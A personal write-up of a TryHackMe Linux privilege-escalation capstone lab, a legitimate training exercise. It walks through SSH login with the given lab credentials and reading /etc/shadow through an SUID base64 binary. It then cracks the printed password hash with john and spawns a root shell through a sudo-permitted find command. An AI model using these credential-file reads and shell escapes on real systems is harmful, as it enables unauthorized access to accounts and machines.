THM Linux Privilege Escalation Capstone Write-up

Nov 18, 2024

Hello all! Wanted to create a quick writeup on how to complete THM's Junior Penteseter Privilege escalation module. More specifically, how-to complete the capstone challenge.

Getting Started

We are given a user and login info for the user Leonard.

  • Username: leonard

  • Password: Penny123

Once the machine starts, we can freely ssh into his account with

ssh leonard@[ip]

input his password, and you have a basic account.

Once inside…

With the base account, we are only allowed to run all commands at a user level. We know this because when we run:

sudo -l

We are met with 

[sudo] password for leonard: 
Sorry, user leonard may not run sudo on [ip]

So, that rules out a bunch of methods. However, there is something to note about the system we are operating on.

If we cat /etc/passwd, we see that there is a user named 'missy'. This will be important later.

missy:x:1001:1001::/home/missy:/bin/bash
// also confirmed if we run "ls /home"
$ ls /home
leonard  missy  rootflag

So what can we do to raise our privileges? Since Leonard can't run sudo, we should try and see if missy can. However, we aren't given missy's password— so we are gonna have to get creative and somehow access the /etc/shadow file.

Lateral movement

So to access missy's account, we need to somehow read /etc/shadow. This is called a horizontal escalation of privileges. So let's see if there are any existing binaries on the system that will allow us to read sensitive files on the system:

$ find / -type f -perm -0400 -ls 2>/dev/null
16779966   40 -rwsr-xr-x   1 root     root        37360 Aug 20  2019 /usr/bin/base64
17298702   60 -rwsr-xr-x   1 root     root        61320 Sep 30  2020 /usr/bin/ksu
17261777   32 -rwsr-xr-x   1 root     root        32096 Oct 30  2018 /usr/bin/fusermount
17512336   28 -rwsr-xr-x   1 root     root        27856 Apr  1  2020 /usr/bin/passwd
17698538   80 -rwsr-xr-x   1 root     root        78408 Aug  9  2019 /usr/bin/gpasswd
17698537   76 -rwsr-xr-x   1 root     root        73888 Aug  9  2019 /usr/bin/chage
17698541   44 -rwsr-xr-x   1 root     root        41936 Aug  9  2019 /usr/bin/newgrp
17702679  208 ---s--x---   1 root     stapusr    212080 Oct 13  2020 /usr/bin/staprun
17743302   24 -rws--x--x   1 root     root        23968 Sep 30  2020 /usr/bin/chfn
17743352   32 -rwsr-xr-x   1 root     root        32128 Sep 30  2020 /usr/bin/su
17743305   24 -rws--x--x   1 root     root        23880 Sep 30  2020 /usr/bin/chsh
17831141 2392 -rwsr-xr-x   1 root     root      2447304 Apr  1  2020 /usr/bin/Xorg
17743338   44 -rwsr-xr-x   1 root     root        44264 Sep 30  2020 /usr/bin/mount
17743356   32 -rwsr-xr-x   1 root     root        31984 Sep 30  2020 /usr/bin/umount
17812176   60 -rwsr-xr-x   1 root     root        57656 Aug  9  2019 /usr/bin/crontab
17787689   24 -rwsr-xr-x   1 root     root        23576 Apr  1  2020 /usr/bin/pkexec
18382172   52 -rwsr-xr-x   1 root     root        53048 Oct 30  2018 /usr/bin/at
20386935  144 ---s--x--x   1 root     root       147336 Sep 30  2020 /usr/bin/sudo
34469385   12 -rwsr-xr-x   1 root     root        11232 Apr  1  2020 /usr/sbin/pam_timestamp_check
34469387   36 -rwsr-xr-x   1 root     root        36272 Apr  1  2020 /usr/sbin/unix_chkpwd
36070283   12 -rwsr-xr-x   1 root     root        11296 Oct 13  2020 /usr/sbin/usernetctl
35710927   40 -rws--x--x   1 root     root        40328 Aug  9  2019 /usr/sbin/userhelper
38394204  116 -rwsr-xr-x   1 root     root       117432 Sep 30  2020 /usr/sbin/mount.nfs

Low and behold, our lovely friend base64 is executable at the root level.

If we do a quick search on gtfobins:

(base64) File read:

It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

LFILE=file_to_read
base64 "$LFILE" | base64 --decode

So back to our system:

base64 /etc/shadow | base64 -d
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

and like that, we got the password hash of missy.

Hash Cracker 2000

So now that we have missy's hash, we can use john to crack the hash. I personally default to using rockyou.txt for the most part, but in a real-world scenario, it is probably best to crack the hash via a rainbow table. But since we are just working with a lab, rockyou.txt will be sufficient in cracking the password.

So on our primary machine copy and paste the hash to any file and run:

john --wordlist=path/to/rockyou.txt file_containing_missy_shadow_hash

Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (missy)
1g 0:00:00:00 DONE (2024-11-18 09:53) 2.564g/s 11815p/s 11815c/s 11815C/s adriano..Liverpool
Use the "--show" option to display all of the cracked passwords reliably
Session completed

and we see here, missy's password is "password1", neat.

Queue the Hollywood line: "I'm in":

We got missy's password? Great, but that's not good enough. You see, missy is still just a regular user. She isn't root— but she is a step forward towards root. The next section will explain how to obtain root from her login, but first let's collect the user flag from /home/missy/Documents/flag1.txt

cat Documents/flag1.txt
[thmflag goes here] //Nice try! Go do it yourself :)

Grand Finale! Ultra Power Move (Over 9k): getting root'd:

First, login as missy:

ssh missy@[ip]
Password for missy:
// once logged in

Last login: Mon Jun  7 21:19:11 2021
$

Oh good heavens… before we confirmed that we horizontally escalated— can missy run any sudo commands?

$ sudo -l
Matching Defaults entries for missy on ip-10-10-71-233:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-71-233:
    (ALL) NOPASSWD: /usr/bin/find

OH LORD, MISSY CAN RUN find AS ROOT. This is the moment we have been waiting for— this is how we obtain root baby.
How? Well… let's ask our friend gtfobins:

(find) Shell:

It can be used to break out from restricted environments by spawning an interactive system shell.

find . -exec /bin/sh \;

SOOOOOOOOO… we can get a shell as root REALLY easily, all we have to do is:

// on the target machine
$ sudo find . -exec /bin/sh \; -quit

# whoami
root

aaaaaaaaaannnnndddddd like that the system is totally owned. Time to collect our flag and dip :)

# cd /home/rootflag
# ls
rootflag2.txt
# cat rootflag2.txt 
[thmflag2 is printed!] //Nice try! Go do it yourself :)

Conclusions:

So, to root this particular machine: you have to start from a user with no privileges, to a user with some, and finally strive to the ultimate goal of root. This lab helps users practice the following concepts:

  • Horizontal Privilege Escalation.

  • SUID binary abuse for read/write capabilities.

  • Hashcracking passwords

  • True veritcal privilege escalation via exploiting misconfigured sudo settings.

With that, I hope this write-up serves you well! Happy hacking!